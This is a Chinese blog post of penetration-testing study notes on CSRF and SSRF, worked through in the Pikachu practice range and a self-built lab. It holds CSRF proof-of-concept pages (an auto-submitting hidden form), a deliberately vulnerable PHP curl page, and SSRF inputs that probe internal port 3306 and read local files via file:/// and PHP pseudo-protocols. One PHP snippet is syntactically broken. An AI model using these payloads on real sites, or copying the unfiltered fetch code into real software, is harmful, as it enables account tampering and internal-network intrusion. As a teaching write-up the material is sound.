第29天:WEB漏洞-CSRF(跨站脚本伪造)和SSRF(服务器端请求伪造)

已于 2023-07-01 17:57:40 修改
阅读量304 收藏 1
点赞数
分类专栏: 渗透测试学习笔记 文章标签: 前端 csrf 网络
于 2023-07-01 17:47:08 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/cailme/article/details/131479667
版权

pikachu参考地址:https://www.cnblogs.com/DxyG/p/13742430.html

php伪协议参考地址:https://blog.youkuaiyun.com/qq_37466661/article/details/126203437

文章参考地址:https://blog.youkuaiyun.com/qq_43378996/article/details/124050308

一、CSRF

1. 什么是CSRF

  • CSRF跨站脚本伪造(客户端)。CSRF通过伪装来自受信任的用户的请求来攻击受信任的网站。
  • CSRF一般的攻击原理是,攻击者向目标网站注入一个恶意的CSRF攻击URL地址(跨站url),当(登录)用户访问某特定网页时,如果用户点击了该URL,那么攻击就触发了,我们可以在该恶意的url对应的网页中,利用来向目标网站发生一个get请求,该请求会携带cookie信息,所以也就借用了用户的身份,也就是伪造了一个请求,该请求可以是目标网站中的用户有权限访问的任意请求。也可以使用javascript构造一个提交表单的post请求。比如构造一个转账的post请求。
  • 所以CSRF的攻击分为了两步,首先要注入恶意URL地址,然后在该地址中写入攻击代码,利用 等标签或者使用Javascript脚本。

在这里插入图片描述
攻击过程
在这里插入图片描述
发生条件:

 1. 登录受信任网站A,并在本地生成cookie。
 2. 在不登出A的情况下,访问危险网站B。

可能存在CSRF漏洞:

 能够修改用户信息和添加用户的地方

2. CSRF靶场

CSRF实例

登陆到靶场的会员中心,进行修改会员信息操作
在这里插入图片描述

抓取修改信息都数据包
在这里插入图片描述

可以看到get提交的数据包/pikachu/vul/csrf/csrfget/csrf_get_edit.php?sex=girl&phonenum=1111&add=1111&email=lucy%40pikachu.com&submit=submit
我们修改提交的数据都在这里,也就是说可以这样直接伪造提交的数据包从而就该服务器内容。

发送数据包http://127.0.0.1/pikachu/vul/csrf/csrfget/csrf_get_edit.php?sex=girl&phonenum=2222&add=2222&email=lucy%40pikachu.com&submit=submit
发现信息修改成功

在这里插入图片描述
我们在另一台服务器(192.168.101.7)中新建一个test.html文件写入
<script src='http://127.0.0.1:8000/pikachu/vul/csrf/csrfget/csrf_get_edit.php?sex=girl&phonenum=3333&add=3333&email=lucy%40pikachu.com&submit=submit></script>
在这里插入图片描述

在靶机登陆pikachu靶场的会员账号状态下,访问我们伪造的CSRF页面192.168.101.7/test.html,可以看到我们在访问test.html的时候,它悄悄地访问了本机服务器的地址
在这里插入图片描述

我们刷新一下pikachu的会员信息页面,发现会员信息修改成功
在这里插入图片描述

CSRF漏洞检测(poc)

在可以修改用户信息地方,都可能存在CSRF漏洞
首先我们使用bp抓取修改数据的包,将数据包发送至bp的CSRF PoC模块
在这里插入图片描述

配置自己所要修改的数据,然后将下面生成的代码复制到另一个服务器中
在这里插入图片描述

将代码保存到test2.html中
在这里插入图片描述
访问test2.html,点击触发按钮
在这里插入图片描述

刷新,用户信息修改成功,说明这里存在CSRF漏洞
如果没有修改成功,则说明不存在CSRF漏洞
在这里插入图片描述

CSRF(POST)

<html>
	<head>
		<meta charset="utf-8">
		<title></title>
		<script>
			window.onload = function(){
				document.getElementById('postsubmit').click();
			}
		</script>
	</head>
	<body>
		<form action="http://127.0.0.1:8000/pikachu/vul/csrf/csrfpost/csrf_post_edit.php" method="POST">
		        <input type="hidden" name="sex" value="girl" />
     			<input type="hidden" name="phonenum" value="1111" />
     			<input type="hidden" name="add" value="1111" />
   				<input type="hidden" name="email" value="lucy&#64;pikachu&#46;com" />
				<input class="sub" type="submit" name="submit" id="postsubmit" value="submit">
		</form>
	</body>
</html>
CSRF防护
 1. 当用户发送重要的请求时需要输入原始密码
 2. 验证HTTP的 Referer 字段
 3. 在请求地址中添加 token 并验证
 4. 二次确认,如验证码等
 5. 在 HTTP 头中自定义属性并验证

二、SSRF

1. 什么是SSRF

SSRF漏洞(服务器端请求伪造):是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。(正是因为它是由服务端发起的,所以它能够请求到与它相连而与外网隔离的内部系统)

SSRF漏洞原理:

SSRF形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能且没有对目标地址做过滤与限制。比如从指定URL地址获取网页文本内容,加载指定地址的图片,下载等等。利用的是服务端的请求伪造。SSRF是利用存在缺陷的web应用作为代理攻击远程和本地的服务器。

在这里插入图片描述

SSRF漏洞利用手段:

  • 可以对外网、内网、本地进行端口扫描,某些情况下端口的Banner会回显出来(比如3306的);
  • 攻击运行在内网或本地的有漏洞程序(比如溢出);
  • 可以对内网Web应用进行指纹识别,原理是通过请求默认的文件得到特定的指纹;
  • 攻击内网或外网有漏洞的Web应用;
  • 使用file:///协议读取本地文件(或其他协议)

参考地址:
http://www.xingkonglangzi.com/ssrf.php?url=192.168.1.10:3306
http://www.xingkonglangzi.com/ssrf.php?url=file:///c:/windows/win.ini

在这里插入图片描述

SSRF漏洞出现点:

1)分享:通过URL地址分享网页内容 

2)转码服务:通过URL地址把原地址的网页内容调优使其适合手机屏幕浏览 

3)在线翻译:通过URL地址翻译对应文本内容 如:百度,有道 

4)图片加载与下载:通过URL地址加载与下载图片 

5)图片 文章收藏功能 

6)未公开的API实现以及其他调用URL的功能 

URL中的关键字:【结合谷歌语法找到入手点】 
share wap url link src source target u 3g display sourceURL imageURL domain

PHP中下面函数的使用不当会导致SSRF:

file_get_contents()
fsockopen()
curl_exec()

SSRF漏洞防御:

1,过滤返回信息,验证远程服务器对请求的响应是比较容易的方法。如果web应用是去获取某一种类型的文件。那么在把返回结果展示给用户之前先验证返回的信息是否符合标准。
2, 统一错误信息,避免用户可以根据错误信息来判断远端服务器的端口状态。
3,限制请求的端口为http常用的端口,比如,80、443、8080、8090
4,黑名单内网ip。避免应用被用来获取获取内网数据,攻击内网。
5,禁用不需要的协议。仅仅允许http和https请求。可以防止类似于file:///、gopher://、ftp:// 等引起的问题。

2. SSRF靶场

自搭靶场

test.php

<meta http-equiv="Content-Type" content="text/html"; charset="utf-8" />
<form action="" method="post">
想要翻译的网站:<input type="text" name="url"><br>
<input type="submit" name="Submit" value="Cheak!">
</form>
<?php
$_POST['url'];
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $_POST['url']);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_exec($ch);
curl_close($ch);
?>

ip.php

<?php
%ip = $_SERVER['REMOTE_ADDR'];
echo "Your ip is ".$ip;
>

以win2003(192.168.101.7)做为靶机服务器,在靶机上部署test.php和ip.php
以win10作为攻击机,ip:192.168.101.1

在攻击机中访问192.168.101.7:8080/ip.php,输出的是攻击机的ip地址
在这里插入图片描述

在攻击机中访问192.168.101.7:8080/test.php
在这里插入图片描述

在输入框中填写url,点击后就会跳转到相应网页
在这里插入图片描述

访问192.168.101.7:8080/ip.php,而此时输出的是服务器的IP地址
在这里插入图片描述

或者直接输入127.0.0.1:8080/ip.php也能访问ip.php,输出靶机ip地址
在这里插入图片描述

可以发现通过这样的方式会让攻击者以内部网络身份访问文件(也就是说这样可以让我们访问一些原本不允许外网访问的文件) ,即通过SSRF漏洞访问了内网资源

我们试试在攻击机中访问靶机的mysql服务192.168.101.7:3306,发现其不允许外部访问,只能由内部访问
在这里插入图片描述

但是如果我们通过存在SSRF漏洞的页面来访问192.168.101.7:3306或者127.0.0.1:3306,发现访问成功
在这里插入图片描述

除了http协议外,还可以使用其他协议如文件读取协议file:///、ftp协议ftp://等
文件读取实例
在这里插入图片描述

脚本类型不同,所支持的协议也不同
在这里插入图片描述

pikachu靶场 SSRF
SSRF(curl)

进入SSRF(curl)页面,点击累了吧,来读一首诗吧,发现url发生变化
在这里插入图片描述
http://127.0.0.1:8000/pikachu/vul/ssrf/ssrf_curl.php—>
http://127.0.0.1:8000/pikachu/vul/ssrf/ssrf_curl.php?url=http://127.0.0.1/pikachu/vul/ssrf/ssrf_info/info1.php
多了个url参数
在这里插入图片描述

通过修改参数url的值,把 url 中的内容改成内网的其他服务器上地址和端口,探测内网的其他信息,比如端口开放情况

访问本机3306端口
在这里插入图片描述

访问同一网段的192.168.101.7的服务器的3306端口
在这里插入图片描述

SSRF(file_get_content)

与curl类型的差不多,只是使用了不同的函数

访问百度
在这里插入图片描述

使用file协议读取文件内容
在这里插入图片描述

使用php伪协议读取文件内容
在这里插入图片描述在这里插入图片描述
pikachu参考地址:
https://www.cnblogs.com/DxyG/p/13742430.html

php伪协议参考地址:https://blog.youkuaiyun.com/qq_37466661/article/details/126203437

CSRF(跨站请求伪造SSRF(服务端请求伪造漏洞复现:风险与防护方法
weixin_43263566的博客
08-30 1034
CSRF漏洞指的是攻击者利用受害者的身份,在其不知情的情况下发送恶意请求给目标网站。由于目标网站无法区分恶意请求正常请求,因此会执行该请求。这使得攻击者能够以受害者的名义执行一些不被授权的操作,例如更改密码、发表言论、转账等。不过我这里是测试就直接在浏览器打开脚本复现成功,其他类型的攻击方式操作也是这样。SSRF漏洞指的是攻击者通过操纵目标Web应用程序中的请求来发起伪造请求。攻击者利用这种漏洞可以访问应用程序所在服务器上的本地资源,或者攻击内部网络中的其他系统,并执行恶意操作。
web安全:服务器端请求伪造SSRF(Server-Side Request Forgery)跨站脚本攻击(XSS)、 跨站请求伪造(CSRF)、验证码辨别机器行为、接口防重放机制‌、接口签名
专注于计算机研发知识和资讯分享
01-13 96
它指的是恶意攻击者往 Web 页面里插入恶意 html 代码,当用户浏览时,嵌入其中 Web 里面的 html 代码会被执行,造成获取用户 cookie、钓鱼、获取用户页面数据、蠕虫、挂马等危害。Man-in-the-middle attack, MITM: 指攻击者与通讯的两端分别创建独立的联系, 并交换其所收到的数据, 使通讯的两端认为他们正在通过一个私密的连接与对方直接对话。CSRF能够做的事情包括:以受害者名义发送邮件,发消息,盗取受害者的账号,甚至于购买商品,虚拟货币转账。
网站攻防之CSRFXSS跨站脚本攻击
热门推荐
06-04 1万+
进入正题之前,先扯一番:黑客本义并非某些人以为的利用网络干坏事的人,刚开始或者说现在的很多,黑客是以技术大牛的形式存在的,也就是在网络领域有一门专场的牛人。有些黑客不干坏事而是干好事,比如利用网站的漏洞,去告诉网站开发运营者你的网站有漏洞,要修补啦,他们却并不会利用这漏洞干坏事,而是以发现漏洞追求技术快感为享受。 说是网站攻防演练,但估计这套东西已经很老很少用了,毕竟作为课程实验的实例都是“经典
CSRF(跨站脚本请求)
路漫漫其修远兮
12-16 791
黑客获取某网站中的某个功能请求,比如创建用户,删除用户,修改密码,支付请求,创建文章请求等,把请求构造到自己的服务器上面,然后发送给用户,该用户访问黑客的服务器就会发起支付请求CSRF(Cross-Site Request Forgery)是一种网络安全攻击,攻击者通过欺骗用户在不知情的情况下发送请求,从而实现对目标网站的操作。,还有个就是token检测:重复利用,token值为空。网站管理员(已经登录网站后台)——黑客构造的恶意服务器(是网站的创建用户请求)——成功创建用户。靶场:PIkachu。
CSRF的脚本,可以做测试使用.zip
05-28
CSRF相关脚本,供大家学习参考,请在靶场或受允许的页面进行测试,道路千万条,安全第一条,希望大家好好学习,为国家为社会做贡献
CSRF进阶之打造一个检测CSRF漏洞的脚本
weixin_30673611的博客
05-06 448
前言: 还记得之前所学的CSRF漏洞吧。因为没有对表单做好对应的漏洞 而造成的CSRF漏洞。学了这个漏洞后逐渐的了解。这个比较鸡助。 代码: import requests,tqdm,time,os,re logo=""" ◇◇◇◇◇◇◇◇◇◇◇◇◇◇◇◇◇◇◇◇◇◇◇◇◇◇◇◇◇◇◇◇◇◇◇◇◇◇◇◇◇◇◇◇◇◇◇◇◇◇◇◇◇◇◇◇◇◇◇◇◇◇◇◇◇◇◇◇◇◇◇◇◇◇...
网络安全学习》 第九部分----CSRF(跨站请求伪造漏洞详解
tomatocc的博客
08-28 485
跨站请求伪造(也称为XSRF,CSRF跨站点参考伪造)通过利用站点对用户的信任来工作。站点任务通常链接到特定URL(例如:http://site/stocks?buy = 100&stock = ebay),允许在请求时执行特定操作。如果用户登录到站点并且攻击者欺骗他们的浏览器向这些任务URL之一发出请求,则执行任务并以登录用户身份登录。通常,攻击者会将恶意HTML或JavaScript代码嵌...
web漏洞挖掘指南 -SSRF服务器端请求伪造
weixin_40418457的博客
10-11 465
一、漏洞原理及触发场景 web服务器经常需要从别的服务器获取数据,比如文件载入、图片拉取、图片识别等功能,如果获取数据的服务器地址可控,攻击者就可以通过web服务器自定义向别的服务器发出请求。因为web服务器常搭建在DMZ区域,因此常被攻击者当作跳板,向内网服务器发出请求。 常见的ssrf漏洞场景(所有需要输入url的地方都可以尝试ssrf,将url改成dnslog地址,验证请求IP是否来自web服务器): 远程图片拉取 xls,doc等文件预览 头像加载 其他网站的访问截图 ssrf常用的协议:
实战分析精华总结:服务器端请求伪造SSRF漏洞数据劫持、复现、分析、利用及修复过程
代码讲故事
12-03 1286
实战分析精华总结:服务器端请求伪造SSRF漏洞数据劫持、复现、分析、利用及修复过程。 SSRF漏洞服务器端请求伪造):是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。(正是因为它是由服务端发起的,所以它能够请求到与它相连而与外网隔离的内部系统)。
浏览器原理--跨站脚本攻击(XSS)、CSRF攻击
xuan的博客
06-07 2505
(1) XSS 全称是 Cross Site Scripting,为了与“CSS”区分开来,故简称 XSS,翻译过来就是“跨站脚本”。XSS 攻击是指黑客往 HTML 文件中或者 DOM 中注入恶意脚本,从而在用户浏览页面时利用注入的恶意脚本对用户实施攻击的一种手段。(2)恶意脚本都能做哪些事情(3)恶意脚本是怎么注入的1、在一个反射型 XSS 攻击过程中,恶意 JavaScript 脚本属于用户发送给网站请求中的一部分,随后网站又把恶意 JavaScript 脚本返回给用户。当恶意 JavaScript
CSRF / XSRF(跨站请求伪造),XSS/CSS(跨站脚本攻击)
m0_59070120的博客
09-20 708
你可以这么理解 CSRF 攻击:攻击者盗用了你的身份,以你的名义进行恶意请求。它能做的事情有很多包括:以你的名义发送邮件、发信息、盗取账号、购买商品、虚拟货币转账等。* 4、危险网站中存在恶意代码,代码为发送一个恶意请求(举例:购买商品/余额转账)* 2、登录成功后在浏览器产生信息存储(举例:cookie)* 6、淘宝验证请求为合法请求(区分不出是否是该用户发送)* 3、用户在没有登出淘宝的情况下,访问危险网站。* 5、携带刚刚在浏览器产生的信息进行恶意请求。* 1、浏览并登录信任网站(举例:淘宝)
网络安全-CSRF跨站伪装脚本注入
码农成长记
10-31 640
一.CSRF是什么?   CSRF(Cross-site request forgery),中文名称:跨站请求伪造,也被称为:one click attack/session riding,缩写为:CSRF/XSRF。 二.CSRF可以做什么?   你这可以这么理解CSRF攻击:攻击者盗用了你的身份,以你的名义发送恶意请求CSRF能够做的事情包括:以你名义发送邮件,发消息,盗取你的账号,甚
CSRF详解
不忘初心,护天下安全!
10-07 4413
前言 忽然发现,一直没有好好写一下csrf,所以在这里对其进行总结。 What's CSRFCSRF(Cross-site request forgery)跨站请求伪造,也被称为“One Click Attack”或者Session Riding,通常缩写为CSRF,是一种对网站的恶意利用。尽管听起来像跨站脚本(XSS),但它与XSS非常不同,XSS利用站点内的信任用户,而CSRF则通过...
CSRF(跨域请求伪造)XSS(跨域脚本攻击)的概念防范措施
tscn1的博客
03-22 1162
这里写目录标题CSRF(跨域请求伪造)原理:防御cookie的sameSite验证refererOrigin二次验证使用非cookie令牌XSS(跨域脚本攻击)存储型XSS反射型DOM型 CSRF(跨域请求伪造) 恶意网站以正常用户为媒介,通过模拟正常用户的操作,攻击其登录过的网站。 原理: 1. 正常用户登录后,获得正常站点的令牌,以cookie的形式保存。 2. 用户访问恶意站点,恶意站点通过某种形式去请求了正常网站,然后将用户的令牌传递到正常网站,完成攻击。 防御 cookie的sameSite
xsscsrf详解
weixin_33737774的博客
08-29 388
XSSCross site scripting,全称“跨站脚本”特点是不对服务器造成任何伤害,而是通过一些正常的站内交互途径,例如发布评论时,提交含有js的内容文本,而服务器没有过滤掉或者转义掉这些脚本,作为内容发布到页面上,那么其他用户在访问的时候就会运行这些脚本。for example:​ // 用 &lt;script type="text/javascript"&gt;&lt;/scrip...
CSRF漏洞验证实战
yuan_boss的博客
08-28 1350
本章节的CSRF漏洞验证实战是基于DVWA靶场的低级别CSRF进行验证的。借助BP拦截的dvwa靶场请求,构造CSRFpoc(这个poc是用于修改密码的)在不退出dvwa的前提下,执行poc用修改后的密码登录dvwa靶场登录成功,验证存在CSRF漏洞
什么是CSRFCSRF漏洞原理攻击与防御(非常详细)零基础入门到精通,收藏这一篇就够了
Javachichi的博客
05-21 1万+
这时该转帐请求的 Referer 值就会是转账按钮所在的页面的URL,而如果黑客要对银行网站实施 CSRF攻击,他只能在他自己的网站构造请求,当用户User通过黑客的网站发送请求WebA时,该请求的 Referer 是指向黑客自己的网站。你可以这么来理解:攻击者盗用了你的身份,以你的名义发送恶意请求,对服务器来说这个请求是完全合法的,但是却完成了攻击者所期望的一个操作,比如以你的名义发送邮件、发消息,盗取你的账号,添加系统管理员,甚至于购买商品、虚拟货币转账等。比如在PHP中,如果使用的是。
Pikachu漏洞靶场 (SSRF服务端请求伪造
柠檬i的博客
04-10 860
SSRF(Server-Side Request Forgery:服务器端请求伪造) 其形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能,但又没有对目标地址做严格过滤与限制 导致攻击者可以传入任意的地址来让后端服务器对其发起请求,并返回对该目标地址请求的数据 数据流:攻击者----->服务器---->目标地址
Web安全之SSRF漏洞
qq_42751192的博客
09-19 659
SSRF (Server-Side Request Forgery)服务器端请求伪造,是一种由攻击者构造,由服务端发起请求的一个网络攻击,一般用来在外网探测或攻击内网服务,其影响效果根据服务器用的函数不同,从而造成不同的影响。SSRF 形成的原因大都是由于服务端提供了从其他服务器获取数据的功能且没有对目标地址做过滤与限制。比如从指定 URL 地址获取网页文本内容,加载指定地址的图片,下载等等。
csrfssrf漏洞原理
最新发布
03-24
SSRF服务器端请求伪造)是指攻击者能够操控服务器去发起对外部或者内部网络资源的HTTP请求。这类漏洞通常是因程序设计缺陷引起——即开发者未能充分验证来自客户端输入的数据便将其用于构建远程调用逻辑。比如文件...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值